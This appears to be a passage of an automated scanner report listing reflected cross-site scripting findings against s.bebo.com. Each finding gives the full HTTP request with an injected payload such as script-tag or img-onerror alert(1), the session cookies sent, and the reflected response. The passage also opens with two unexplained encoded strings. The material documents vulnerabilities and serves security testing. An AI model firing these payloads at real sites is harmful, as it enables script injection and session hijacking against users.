rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 06 Jul 2011 14:00:48 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 07 Jul 2011 14:00:48 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:47 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "K087846DA49<SCRIPT>ALERT(1)</SCRIPT>F1F0690E9F" was not recognized.
*/

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03 was submitted in the REST URL parameter 2. This input was echoed as ef1cd"><img src=a onerror=alert(1)>e91147b2c03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Siteef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14777
Date: Wed, 06 Jul 2011 11:22:11 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-siteef1cd"><img src=a onerror=alert(1)>e91147b2c03-_default" >
...[SNIP]...

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 292f7'><script>alert(1)</script>55c886dab8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site292f7'><script>alert(1)</script>55c886dab8f/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14694
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site292f7'><script>alert(1)</script>55c886dab8f/_default_css&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d56a'%3b4e37d154695 was submitted in the REST URL parameter 2. This input was echoed as 5d56a';4e37d154695 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /c/Site5d56a'%3b4e37d154695/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14483
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site5d56a';4e37d154695/_default.css/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('
...[SNIP]...

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18ffc<script>alert(1)</script>491fb71b12c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14676
Date: Wed, 06 Jul 2011 11:22:14 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css page, please try again.</div>
...[SNIP]...

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3141'><script>alert(1)</script>03a6132018e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site/_default.cssd3141'><script>alert(1)</script>03a6132018e?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14244
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site/_default_cssd3141'><script>alert(1)</script>03a6132018e&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f was submitted in the REST URL parameter 3. This input was echoed as af2df"><img src=a onerror=alert(1)>11c0a48793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Site/af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14267
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-af2df"><img src=a onerror=alert(1)>11c0a48793f" >
...[SNIP]...

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://s.bebo.com
Path:	/c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d42'%3b1c774af16d5 was submitted in the REST URL parameter 3. This input was echoed as a4d42';1c774af16d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /c/Site/_default.cssa4d42'%3b1c774af16d5?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14081
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site/_default.cssa4d42';1c774af16d5/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87eb8<script>alert(1)</script>fda742dfacd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:13 GMT
Content-Length: 14722
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js page, please try again.</div>
...[SNIP]...

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d8f'%3b5319fe373f was submitted in the REST URL parameter 2. This input was echoed as b2d8f';5319fe373f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /c/siteb2d8f'%3b5319fe373f/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:12 GMT
Content-Length: 14520
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/siteb2d8f';5319fe373f/index20_script.js/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleR
...[SNIP]...

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6 was submitted in the REST URL parameter 2. This input was echoed as 123b5"><img src=a onerror=alert(1)>3788d604ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 14823
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site123b5"><img src=a onerror=alert(1)>3788d604ea6-index20_script" >
...[SNIP]...

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 10a5d'><script>alert(1)</script>8dd8fd16174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Length: 14740
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script_js&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=nl'>
...[SNIP]...

